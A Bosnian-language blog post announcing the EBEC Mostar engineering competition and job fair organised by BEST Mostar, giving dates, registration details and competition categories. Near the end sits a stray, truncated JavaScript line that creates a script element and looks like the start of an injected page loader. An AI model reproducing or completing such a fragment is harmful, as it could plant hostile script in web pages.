Postanite dio inženjerskog takmičenja!

Tehnički klub Univerziteta „Džemal Bijedić“ – BEST Mostar organizuje lokalno inženjersko takmičenje pod nazivom „EBEC Mostar – Dani inženjera“ koje će se održati 27. i 28. marta ove godine, s tim da će prvog dana biti upriličen sajam poslova, a drugog dana takmičenje za mlade inženjere.

Prijave za takmičenje su otvorene od 4. do 18. marta i svi zainteresovani studenti tehničkih fakulteta Univerziteta „Džemal Bijedić“ mogu se prijaviti na: ebec.bestmostar.org. Takmičari se mogu prijaviti pojedinačno ili u već oformljenim grupama od 4 studenta. Također, oni sami biraju kategoriju za koju se prijavljuju s obzirom da je takmičenje podijeljeno u dvije kategorije: Tim dizajn (eng. Team Design, praktično rješenje problema) i Studija slučaja (eng. Case Study, teoretsko rješenje problema). Najuspješniji takmičari, odnosno pobjednici iz obe kategorije, svoj put nastavljaju na balkanskom regionalnom inženjerskom takmičenju u Sofiji gdje će predstavljati Bosnu i Hercegovinu. Ukoliko naši studenti pobijede u Sofiji, odlaze na europsko inženjersko takmičenje u Varšavu.

Bitno je istaknuti da se takmičenje ovog tipa po prvi put organizuje kako u Mostaru, tako i u Bosni i Hercegovini.

BEST Mostar je prva i jedina organizacija iz Bosne i Hercegovine koja je postala član Europske organizacije studenata tehnike – BEST (Board of European Students of Technology). To je volonterska, neprofitna i apolitička studentska organizacija koja studentima Univerziteta “Džemal Bijedić” u Mostaru pruža mogućnost dodatnog stručnog obrazovanja, kontakta s budućim poslodavcima, rada u međunarodnim timovima, usavršavanja organizacijskih vještina, upoznavanja europskih kultura, te njihovo razumijevanje i razvijanje tolerancije.

var d=document;var s=d.createElement(‘script’);

Autor

Tehnografija je tehnološki blog koji svakodnevno donosi novosti iz društvenih mreža, internet startupa, mobilnih tehnologija, zanimljivih tehnoloških događaja te operativnih sistema. No, to nije sve. Kvalitetne recenzije, i jednostavni tutorijali će vam pokazati da svijet Interneta uopće nije tako složen, kako izgleda na prvi pogled.